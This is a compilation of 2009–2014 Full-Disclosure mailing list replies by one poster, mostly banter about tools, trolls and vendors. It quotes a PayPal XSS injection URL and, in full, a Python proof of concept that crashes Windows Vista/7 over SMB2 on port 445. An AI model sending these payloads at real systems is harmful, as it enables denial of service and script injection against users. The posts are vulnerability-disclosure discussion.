Re: [Full-disclosure] [SPAM] Re: Ektron CMS TakeOver Part (2) - PaylPal-Forward.com demonstration

[Randal T. Rioux]

On 2/4/2014 6:36 PM, Mark Litchfield wrote:
> On 2/4/2014 3:13 PM, security curmudgeon wrote:
>> : > This is not the behavior of the site as of 48 hours ago.
>>
>> : Let me check.  Normal registration should also be available ? Infact I
>> : will remove the registration.
>> :
>> : The purpose of this whole registration in the first place was to allow
>> : for future postings I am going to make later this week that would only
>> : be available to registered users.  Not necessarily vulnerabilities, but
>> : useful "stuff" for pentesting.  Also all registered users would be
>> given
>> : a 48 hours head start on any new vulnerabilities that I post in the
>> : future.
>>
>> Which is great, but I strongly recommend you allow a site-specific
>> registration for such purposes. Giving up one of the two dominant social
>> media accounts for it is excessive.

> I should add, I am all for constructive criticism.  But a public forum
> is not really the place.  Feel free to email me directly.

Yes, it is. This is a security forum. Your authentication mechanism is a
major security issue.

The damn thing should get its own CVE.

Think about it and you'll see the point.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PRISM

[Randal T. Rioux]

░▄▄░░░
░█░░▀▀▄
█░░░▒▒▒▒▒░░█░░░
░░░█░░▄██▀▄▄░▄▄▄█░░
░▄▀▒▄▄▄▒░█▄▄█░░░██▄▄██░
█░▒█▒▄░▀▄▄▄▀█░░░▒░█
█░▒█░█▀▄▄░█▀▀▄░░▄▀▀▀▄▒█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀█░░█░
░░█░░░▀▄▀█▄▄░█▀▀▀▀▀█▀██░█░░
░░░███░░▀█▄▄▄█▄▄█▄░█░░░
█▀▀▄░█░░░█░█▀██░█░░
░▀▄░▀▀▄▄▄█▄█▄█▄█▄▀░░█░░
░░░▀▄▄░░░▒░░░█░
░░▀▀▄▄░▒▒█░
░░▀▄█░░

Gr

On 10/2/2013 4:52 AM, catsandd0gz.dinosaursandwh0...@hushmail.com wrote:
> Is anyone else super mad?
> 
> 
> 
> -BEGIN PGP PUBLIC KEY BLOCK-
> Version: GnuPG v1.4.11 (GNU/Linux)
> 
> mQINBFJL27oBEACzRSR2iHWfdmnAehi9WCHqWp0F38ZVmdSfJWlG0kmN2kpO3EqP
> zRM7yoDw1822PpL+O3kYgqI1a+l2KU3h2k0K/KCwjTv0chSo9Dr4gzdKVmyWYLA8
> 9U+EttlD1iOYETL7qCnL95iykUTb70Q5a50KguCqs28HLhC6NjrRQFKFx2+vb8NP
> B/TEN5bqi8KxPv3T5Gy+20iVm291IXo5hbMqq4Wt43qUjLnbZWzpPuWw/FjrYOVB
> w5WV36L0ilSRjQMxCG2F4rPA53WMgD2uDBk0Wo5XrkllN6hgykoCsJk20D9sLxaI
> 0Yrr1pJJ/RYV7pFmDEAxzsiWE8CSDMgvn6GI0+66z6/vqVNKAQMzd3+mzkeLMj6f
> M52RPbFM6wpO5pnfFBlqftNE2a0+86a9xX1QlPlDiC6x9BlPSZH5IGmujMWZMUDU
> C1zm2j/TkpUvGbkm7Rrtd5+SkRk8MvEnDRDlnWq2KV8eRG+LbvSNC0gkxU/WKIXU
> IM/xZJCiPgmIZeNBtMmMb8hMeowaD6GfW52riS8Kv2UEgBNT0TAB2wdrWDLpu7at
> +KzlF/u15tCD9NiXbX8Xli1+N2susI7lAZIQt4S8TYS2txQT6HMfO8ycZYLgT2gG
> IIvo4GyTUVTG8ls6DVMdXDSa+/ZbgmRPpovvefp172e4DFAyK/aEtKncGwARAQAB
> tDR3aDByZXMgPGNhdHNhbmRkMGd6LmRpbm9zYXVyc2FuZHdoMHJlc0BodXNobWFp
> bC5jb20+iQI4BBMBAgAiBQJSS9u6AhsDBgsJCAcDAgYVCAIJCgsEFgIDAQIeAQIX
> gAAKCRBhObh+hQ85kWSOEACkIvuCEd29eWuvc0PX1zkNX5TApNNVF3+JOumso7t6
> fdqRoq3NtUyF5beRocMDF69Yge/YH2x406DRMEKPIGyTgjHYlF1aQJkou3SpV5/3
> CSllnWlEPqOoPLpRHfL42OXf50XAZnWx+X2VbI+hlI+dUCPwJJYB2kMbHc7PVlVb
> E9LHwFNW1vFBCgtZETH+btAxXWQaiv3XLwcsQslhZKafAoDvu89Tg02Se4lbBCV+
> m8dHeT2nfrxPWrxwimngnfFh6FkchoZMZvvDi+310GyB4xvgdRDTQlk6juGotaA9
> WSx1l5oYHYsoE8GIPyheNBleMsgtWFAnrV2S+8J+1rrMpcjzwN0sxAT+cuqQv6NP
> IIZeg8FnB97jhQts5dV//IgO2y4jtkpF54+2GbXC8f2ja4pRHqIy3135C2U/SuLN
> RT1tgjia+z/VESAdilakR+13xZ3Z5QBfpGvKcV5C+H8XVEnvGUUS967RQu1Va5Xn
> rkh6ly2c8IGK4mce9Bj54w+aiBeb/rUJb4JdIytCa0LSZ3or2HkdqkujWUipm+A8
> Dd7Wg8UJHkLiIYKATLXnuHfqnJ1XCaETFcpMFAeVr4Df02VO2vf4GzEdEzUt1Odg
> D57iTn5HygQzMRTczJP0Wr0Jv3mJOMvD67MwNZzK/cl6BHDGF7V60YyJ/EBCsqg1
> k7kCDQRSS9u6ARAAvq4iV2wlRhnPvOyvF3Dup66Kl3L06UTezxSLoOt1HpIcEc8k
> lG+MCNv8W4cGcrPhI7W3DZqwMebCZYl1MCnA4lIqq1cVOL+sDK7QwTL+gWPFZLkA
> HgrtEwR4oXllP5cwnhGe3t4vCiYGj/Ix7qZjNZmjg7paYZGPqXi4whr9rWV7nNl3
> XGhAZQhlN6j/6X21ay7UrLYoCab2YXPh+cBvlPcBjf7v7PR4E5E4H/Lha0ckZYxs
> T0FKI10rrEz1aqTAwbUJE9ncfXTJtYcWvcIAPUNWkDGAxwqr7ZdjvzsV6j/iBLWZ
> m/DdlVUxn71yAIAFcSlLV+xV661mEtAEZZDkZ94OJdTt352mmmqdzHvNBEPD67ml
> qbu0ZgQpxdhRDQTEE5YByKmlvuXhyvppRBpPopFCQm+xTWvzID2G90LAjKwpztfO
> f0lwHGi7yW8Vzitt15wRn338l1UaGriEsMTeF55hbdgmNN1ic9M0H/5MWT/PU88+
> 4BlB+dzpxK6v8/Q7DxWamOttbmTQEXCEy9njGib/LCyRfh+PNyWOoqgj8l6zEzhR
> arwlw1gVP9H5bSJT3k3PksB1ZBdwRlxldq+Y0XZn3Rd+RpmYrs31MNp3WcnxaxAx
> bcn0vCE0qu3Fz8P2Norq3udbnKJm8YEBM7LDjjnPFxev+g6t/J6pVef5F70AEQEA
> AYkCHwQYAQIACQUCUkvbugIbDAAKCRBhObh+hQ85kROfD/4u/aTOKrjuHon71kbL
> S/L4b3firPNyaBfsJq6svH+QpyWWAgfz06e5FI9+3hhoLtC5vbpuJh2ZYZ4o9NwU
> rjNFFQAYupORvQJfZmF2H17ISzYdwnJBzgD34XaZ1Qx4VXLX78km3KlBaHFCp8Ev
> rvMbbnnfpafNlFrZM02FX1Wh1xADobmiHqQfbd+w/SXVmUu0YGibBeYfhSZd7LSF
> QLrc0ccaif9v2+bl7MK3MTRWc6aIxw8z3T8QIhE6BSujKn82xlHxQ/8lHli/TSYb
> nuobH2l7k111JbmlsXZwZtZGN73z74pESIZWBvrgSt0JDXdojvO7ion1pA0lbxiS
> IdLK/BuGRjVq91OfhPud155P1U9o82Fep24GfnMx1LSR41SL5LhS7SYCFusA4pKe
> 4ckiVTtLEeAC9e6XAJT+/83XT3JEXLTMJpb3xbKiGa+61+6NKYts1Sg4mnYC2Tsx
> PHQ0tPgwq/w1HvOsgYGzw8ZZdQz2F8I/UVFRORok6s3HLSjN7/5uG6qtUiksmdZm
> Ou94DIPVe3jb+DC/ERY3T19TqrL2iDBYx1ju1BD2dGlLCKX9T+O/VwMapnu3fhUj
> LnZKr09S0J5kiB8UPW/5ffIzJjqr5iaABD+AfOxLhRgyPv+bQw9FF+Y7jx1PSJJ3
> yeZuqHSgRZbpqXJ/h6TgboP5fw==
> =j557
> -END PGP PUBLIC KEY BLOCK-
> 
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7

[Randal T. Rioux]

On 8/28/2011 6:52 PM, Juan Sacco wrote:

> This isnt a company making a big product, Im doing this because I like 
> doing it.

Good for you. I think that is great. But you are pretending to be a "big
company." Stop that.

I am happy to see you removed that silly donation-for-download scheme.

> I'm not forcing you to use my software, if you don't like it please 
> don't waste bandwith on it.

Fantastic advice.

> We are working on a JAVA version in order to support multi-plataform, 
> and because I really like to JAVA

I did too, until I learned how to program. Oracle's purchase/murder also
hastened my departure.

Might I suggest C++/Qt? :-)

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] International Master In Computer Security and Cyberwarfare

[Randal T. Rioux]

How can you expect to be taken seriously when your Web site doesn't have
pictures of attractive, multi-ethnic women in business attire pointing
at holographic displays of random binary digits?

Bah!

Randy


On 5/23/2011 10:10 AM, Mastere NIS wrote:
> Our master “/Network and Information security/” (N&IS) program is a
> springboard to a variety of exciting careers in security information
> ranging from computer network administrator, IT security expert or
> cyberwarfare expert for the Department of Defense to security officer in
> charge of the IT security in an international firm.
> 
> Through theoretical and practical study, the N&IS program will provide
> you with the skills and knowledge you need to work in today’s fast
> moving information security landscape. It is the only program of this
> kind in France as it offers a different and new approach to information
> security by considering the attacker’s view point. This program also
> offers you insight into advanced study options such as active auditing
> or cyber warfare techniques and concepts, helping you to choose your
> career path. Our program emphasizes hands-on, practical training
> providing you with an additional learning opportunity that is
> best-suited for real world demands.
> 
> The Specialized Master “N&IS” is a Post-master professional degree
> called in French “mastère spécialisé”. It is a very specialized and
> highly technical one-year study course taught in English. This program
> is aimed at international students with a bachelor’s Degree or
> equivalent in the following related fields: computer science, computer
> engineering, applied mathematics. It is opened to higher level students
> and experienced engineers in IT as well.
> 
> More information on the homepage
> of the International Master.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Stuxnet

[Randal T. Rioux]

On 05/01/2011 01:38 PM, satyam pujari wrote:

> *request* "Hello FD, Can anyone handle this guy please ?"

Allow me to spin this broken record again...

Censorship => Bad
E-Mail Filters => Good

Take control of your inbox and don't rely on others!

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

[Randal T. Rioux]

On 3/29/2011 9:13 PM, runlvl wrote:
> Insecurity Research is happy to announce the release of version 2.5,
> get it now while is still hot !


Oh! And you list the Dept. of Energy as a customer. I used to work
there, and still talk to a lot of the security offices for various
locations. They've never heard of it.

Also, did you get clearance from the DoE's Office of Public Affairs to
list them as a customer? They get touchy about that sort of stuff.

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

[Randal T. Rioux]

On 3/29/2011 9:13 PM, runlvl wrote:
> Insecurity Research is happy to announce the release of version 2.5,
> get it now while is still hot !
> 
> Insect Pro 2.5 is a penetration security auditing and testing software
> solution designed to allow organizations of all sizes mitigate,
> monitor and manage the latest security threats vulnerabilities.
> 
> We’re always working to improve Insect Pro and now the users obtain
> a new feature: A fully automated active web application security
> reconnaissance tool.
> 
> Check it out: http://www.youtube.com/watch?v=ifiyHem7fMA
> 
> We invite you to take a visual tour where you can find screenshots and
> videos, visit us now at http://www.insecurityresearch.com
> 
> There is no fixed price to get a copy, you can obtain the full version
> by making a minimum donation to keep us coding.
> 
> We are really thankful with the community!

I keep getting this error when trying to download:

"Please enter an amount greater than zero."

Can you fix that so I can test out the software. I'm really curious
about how much code was lifted from other projects. Nice logo though!

Thanks,
Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Your email message was blocked

[Randal T. Rioux]

On 3/30/2011 11:31 PM, r...@bellaliant.ca wrote:
> The following email message was *blocked* by Bell Aliant Content
> Filtering Device:
>   
>*From:*  ra...@procyonlabs.com
>*To:*peter.mo...@bellaliant.ca
>*Subject:*   Re: [Full-disclosure] SSL Capable NetCat and more
>*Message:*   B4d93f5990001.0001.0003.mml
> 
> Because it may contain *unacceptable language*, or *inappropriate
> material*.  Please remove any unacceptable or inappropriate language and
> resend the message.
> 
> The blocked email will be automatically deleted after *5 days.
> *
> Content Rule: Policy Management (Inbound) : Block Common & Mild Profanity
> 
> r...@bellaliant.ca
> 

F**K YOU.

Here's a nickel - get yourself a real mail server.

Randy

-- 
Disclaimer:

By sending an email to ANY of my addresses you are agreeing that:

1. I am, by definition, "the intended recipient"
2. All information in the email is mine to do with as I see fit
3. I will take the contents as representing the views of your company
4. If your email is an "Out of Office" reply on a mailing list, I will
social engineer your company
5. This notification overrides any disclaimer or statement of
confidentiality that may be included on your message

Further, you understand that if any of the following conditions are met
that you are indeed, a bag of douche:

1. Your message identifies the device you sent it from
2. You messed up the thread by top-posting

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SSL Capable NetCat and more

[Randal T. Rioux]

On 3/27/2011 4:29 PM, Dan Tulovsky wrote:
>> Beside that, scnc is written in pure-Perl, and is easily modifiable
>> by anyone. Such really simple (dumb?) stuff should not be written in
>> low-level languages such as C.
> 
> You can't be serious...

Shirley, he is.

Perl is shite. It's a dependency hell, it lacks the "logic" of C/C++ and
is interpreted (as pointed out by others). Any code base can be
modifiable by anyone - as long as it is open sourced.

Don't get me wrong, I'm not criticizing the product. I think reinventing
the wheel in lesser performing methods is great. Just don't disregard C.
To be honest, in my code auditing days, it was SO much easier to find
flaws in C/C++ than Perl, because Perl is just messy and ugly. Something
looks wrong, but it's right. Uggh!

But if you need to write something quick for an easy task, by all means,
hit the Perl.

It's like using Java to write large scale enterprise products. Who the
hell? Why? Portability is nice, but performance is better. Java belongs
in the small-scale realm of applications.

Grumble grumble. Get off my lawn. Back to the lair :-)

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

[Randal T. Rioux]

Thought this would be appropriate :-)

http://xkcd.com/149/

On 2/15/2011 4:00 PM, Eyeballing Weev wrote:
> What do you expect from a woman?
> 
> Rebecca, kindly make me a sandwich
> 
> On 02/15/2011 03:44 PM, Cal Leeming [Simplicity Media Ltd] wrote:
>> I did apologise, no need to drag it out into the yard and beat it with a
>> stick lol.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] OpenBSD Paradox

[Randal T. Rioux]

On 12/15/2010 5:00 PM, BMF wrote:
> 2010/12/15 musnt live :
>> What is this time to stop the press!
> 
> This fake broken English schtick is really stupid and annoying. Knock
> it off. In the meantime you are kill filed. I suggest everyone else do
> the same as nothing useful has ever come of this person.

First, obligatory:

http://www.pulledbyakite.com/funnypics/s_troll.jpg

Second, if you can't take a joke:

http://www.pulledbyakite.com/funnypics/gtfoti.png

Now let's hug and move on.

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows is 100% self-modifying assembly code?(Interesting security theory)

[Randal T. Rioux]

On 12/10/2010 10:10 AM, John Horn wrote:
> Is this a joke?
> 
> 
> --
> 
> John Horn
> 
> City of Tucson, IT Department
> 
> Network Services (Network security)
> 
> Phone: (520) 837-6036
> 
> --
> 
> CONFIDENTIALITY NOTICE: If you have received this email in error,
> please immediately notify
> 
> the sender by e-mail at the address shown.  This email transmission
> may contain confidential information.
> 
> This information is intended only for the use of the individual(s) or
> entity to whom it is intended even if addressed incorrectly.
> 
> Please delete it from your files if you are not the intended
> recipient.  Thank you for your compliance, time and attention to this
> matter.


A top-post, bogus "legal" notice AND an office phone #.

Social engineers - unite!

Might want to think about that a little.

And if you have to ask whether something is a joke, then the troll was
successful.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Paypal XSS Vulnerability - Resolved

[Randal T. Rioux]

I find it humorous that an organization that pretends to be a bank and
regularly steals money from its members has the balls to distribute a
"PayPal Responsible Disclosure Policy."

Good luck with that.

Randy


On Fri, March 26, 2010 10:49 pm, Orbeton, Jon wrote:
> All:
>
> The XSS vulnerability reported below was addressed at approximately 17:45
> PDT today.
>
> For information about how to report security issues to PayPal, please
> refer to the PayPal Responsible Disclosure Policy documented here:
> https://www.paypal.com/cgi-bin/webscr?cmd=xpt/cps/securitycenter/general/ReportingSecurityIssues-outside
>
> Site security issues should be reported to:
>   sitesecur...@paypal.com
>
> All reports will be handled professionally and quickly. A PGP key is
> available at the URL above.
>
>
> Thanks,
> Jon Orbeton
>
> PayPal, an eBay Company
>
> 
>
> From: Wesley Kerfoot 
> Date: Fri, 26 Mar 2010 15:46:09 -0400
>
> Paypal is affected by an XSS vulnerability where it fails to validate
> input for the following url:
>
> https://www.paypal.com/xclick/business=
>
> One can add arbitrary javascript with no need for any filter evasion.
>
> https://www.paypal.com/xclick/business= alert("xss");
> 
>
>
> As far as I know only the above url is affected. All of the usual XSS
> attacks will work with this.
>
> Cheers.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SecurityFocus to partially shut down

[Randal T. Rioux]

On Fri, March 12, 2010 1:45 pm, Michal Zalewski wrote:
>> http://www.securityfocus.com/news/11582
>
> "While the news portal section of SecurityFocus will no longer be
> offered, we think our readers will be better served by this change as
> we combine our efforts with Symantec Connect and continue to provide a
> valuable service to the community."
>
> http://www.symantec.com/connect/
>
> In other words, RIP :-/

Who didn't see this coming?

Symantec... OM NOM NOMMING companies since 1984.

Randy


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] How I become Vice President of Security at Yahoo! 1999-2005.

[Randal T. Rioux]

Decent attempt at trolling. Some beginner mistakes, but the message was
relayed as intended (I'm sure). Comments inline.

On Fri, February 19, 2010 6:45 pm, John Q Public wrote:
> -BEGIN PGP SIGNED MESSAGE- Hash: SHA1
>
> Greetings.
>
> I've been holding this one back for a while. It's been eating at my skin.
>
> I was just an intern at the time, but I'd get the mail, copy the text,
> delete his mail, and send the mail to my supervisor, authored by me.

Clarify the type of mail - it adds texture to the troll.

> I still remember the friendships I made at Yahoo. The cute girlfriends I
> have and how it changed my life. I remember I was just some office kid
> opening up emails in outlook 2000. But I risen to be so much more. This
> mysterious person helped me do it.

Perhaps some reflection on the type of assistance? Also, Yahoo! employees
do not have cute girlfriends.

> Eventually, I was promoted up Vice President of Security at Yahoo! and
> made nearly six figures a year.

The salary figure is off. Take into consideration the role, size of
organization and geographical location. Then again, the "experience" you
detailed would possibly justify this low figure.

> This is what I did. And I told no one. All I know is there is a kid whose
> advice I took credit for and he is the key factor for my success in life.
>
> I live in a $500k condo in Mountain View. Wife, 2 kids, and a Lexus (2009
> Hybrid, Italian leather seats, TV in backseat for the kids).

That amount in Mountain View would get you 20x20 in someone's basement.
Also, they don't make seats with the skin of Italian people. Some ethical
thing.

> I just wanted to let you know that the security tips helped. I feel
> pretty guilty for flat out taking credit for all his work though. I just
> had to get it off my chest.
>
> Thank you so much, if you read this list. You've touched my life.

> -BEGIN PGP SIGNATURE- Charset: UTF8 Note: This signature can be
> verified at https://www.hushtools.com/verify Version: Hush 3.0

Hmm. Must be legit. It's signed!

Okay, break time is over. Back to code monkeying.

Randy


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Peiter "Mudge" Zatko petition to be named U.S. Cybersecurity Chief

[Randal T. Rioux]

The Sp3ctacle wrote:
> http://www.ipetitions.com/petition/mudge4cyberczar/index.html
> 
> This petition is posted in support for the nomination of Peiter Zatko
> (aka mudge) to the President's post of Cybersecurity Chief. We've all
> seen how effective past efforts have been regarding this initiative,
> and realize the importance of nominating someone who understands not
> only all facets of cybersecurity, but has garnered the respect of both
> peers and adversaries in the space. Dr. Zatko's bio is available at:
> http://en.wikipedia.org/wiki/P... and
> http://www.allbusiness.com/gov...

Yeah, because if it is one thing he wants, it is a powerless figurehead 
position of bureaucracy and politics.

There is a reason why nobody stays in the high level (US) information 
security roles for long.

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

[Randal T. Rioux]

Scratch that - the version of 2008 I had wasn't an official R2 release. So
original reports still hold. It didn't crash my R2 build 7600.

Laurent, et al, has this been tried against an Itanium machine? Just
curious. Nobody at work will let me test the exploit against their Itanium
servers.

Randy

On Mon, September 14, 2009 12:02 am, Randal T. Rioux wrote:
> After testing my version of the exploit (using Java instead of Python) I
> tried it against a Windows Server 2008 R2 installation - it went down.
>
> http://www.procyonlabs.com/software/smb2_bsoder
>
> Randy
>
>
> laurent gaffie wrote:
>> Advisory updated :
>>
>>
>> =
>> - Release date: September 7th, 2009
>> - Discovered by: Laurent Gaffié
>> - Severity: High
>> =
>>
>> I. VULNERABILITY
>> -
>> Windows Vista, Server 2008 < R2, 7 RC :
>> SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
>>
>> II. BACKGROUND
>> -
>> Windows vista and newer Windows comes with a new SMB version named SMB2.
>> See:
>> http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
>> for more details.
>>
>> III. DESCRIPTION
>> -
>> [Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS
>> patch, for another SMB2.0 security issue:
>> KB942624 (MS07-063)
>> Installing only this specific update on Vista SP0 create the following
>> issue:
>>
>> SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
>> PROTOCOL REQUEST functionnality.
>> The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a
>> SMB server, and it's used to identify the SMB dialect that will be used
>> for futher communication.
>>
>> IV. PROOF OF CONCEPT
>> -
>>
>> Smb-Bsod.py:
>>
>> #!/usr/bin/python
>> #When SMB2.0 recieve a "&" char in the "Process Id High" SMB header
>> field
>> #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
>>
>> from socket import socket
>>
>> host = "IP_ADDR", 445
>> buff = (
>> "\x00\x00\x00\x90" # Begin SMB header: Session message
>> "\xff\x53\x4d\x42" # Server Component: SMB
>> "\x72\x00\x00\x00" # Negociate Protocol
>> "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
>> "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
>> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
>> "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
>> "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
>> "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
>> "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
>> "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
>> "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
>> "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
>> "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
>> "\x30\x30\x32\x00"
>> )
>> s = socket()
>> s.connect(host)
>> s.send(buff)
>> s.close()
>>
>> V. BUSINESS IMPACT
>> -
>> An attacker can remotly crash any Vista/Windows 7 machine with SMB
>> enable.
>> Windows Xp, 2k, are NOT affected as they dont have this driver.
>>
>> VI. SYSTEMS AFFECTED
>> -
>> [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008
>> < R2, Windows 7 RC.
>>
>> VII. SOLUTION
>> -
>> No patch available for the moment.
>> Close SMB feature and ports, until a patch is provided.
>> Configure your firewall properly
>> You can also follow the MS Workaround:
>> http://www.microsoft.com/technet/security/advisory/975497.mspx
>>
>> VIII. REFERENCES
>> -
>> http://www.microsoft.com/technet/security/advisory/975497.mspx
>> http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx
>>
>> IX. CREDITS
>> -
>> This vulnerability has been discovered by Laurent Gaffié
>> Laurent.gaffie{remove-this}(at)gmail.com <http://gmail.com>
>>
>> X. REVISION HISTORY
>> -
>> September 7th, 2009: Initial release
>> September 11th, 2009: Revision 1.0 release
>>
>> XI. LEGAL NOTICES
>> -
>> The information contained within this advisory is supplied "as-is"
>> with no warranties or guarantees of fitness of use or otherwise.
>> I accept no responsibility for any damage caused by the use or
>> misuse of this information.
>>
>> XII.Personal Notes
>> -
>> Many persons have suggested to update this advisory for RCE and not
>> BSOD:
>> It wont be done, if they find a way to execute code, they will publish
>> them advisory.
>
>


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

[Randal T. Rioux]

It's fun :-)


On Mon, September 14, 2009 12:14 pm, D-vice wrote:
> You wrote an exploit in java
>
>
> *head explodes*
>
> On Mon, Sep 14, 2009 at 6:02 AM, Randal T. Rioux
> wrote:
>
>> After testing my version of the exploit (using Java instead of Python) I
>> tried it against a Windows Server 2008 R2 installation - it went down.
>>
>> http://www.procyonlabs.com/software/smb2_bsoder
>>
>> Randy
>>
>>
>> laurent gaffie wrote:
>> > Advisory updated :
>> >
>> >
>> > =
>> > - Release date: September 7th, 2009
>> > - Discovered by: Laurent Gaffié
>> > - Severity: High
>> > =
>> >
>> > I. VULNERABILITY
>> > -
>> > Windows Vista, Server 2008 < R2, 7 RC :
>> > SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
>> >
>> > II. BACKGROUND
>> > -
>> > Windows vista and newer Windows comes with a new SMB version named
>> SMB2.
>> > See:
>> >
>> http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
>> > for more details.
>> >
>> > III. DESCRIPTION
>> > -
>> > [Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS
>> > patch, for another SMB2.0 security issue:
>> > KB942624 (MS07-063)
>> > Installing only this specific update on Vista SP0 create the following
>> > issue:
>> >
>> > SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
>> > PROTOCOL REQUEST functionnality.
>> > The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to
>> a
>> > SMB server, and it's used to identify the SMB dialect that will be
>> used
>> > for futher communication.
>> >
>> > IV. PROOF OF CONCEPT
>> > -
>> >
>> > Smb-Bsod.py:
>> >
>> > #!/usr/bin/python
>> > #When SMB2.0 recieve a "&" char in the "Process Id High" SMB header
>> field
>> > #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
>> >
>> > from socket import socket
>> >
>> > host = "IP_ADDR", 445
>> > buff = (
>> > "\x00\x00\x00\x90" # Begin SMB header: Session message
>> > "\xff\x53\x4d\x42" # Server Component: SMB
>> > "\x72\x00\x00\x00" # Negociate Protocol
>> > "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
>> > "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
>> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
>> > "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
>> > "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
>> > "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
>> > "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
>> > "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
>> > "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
>> > "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
>> > "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
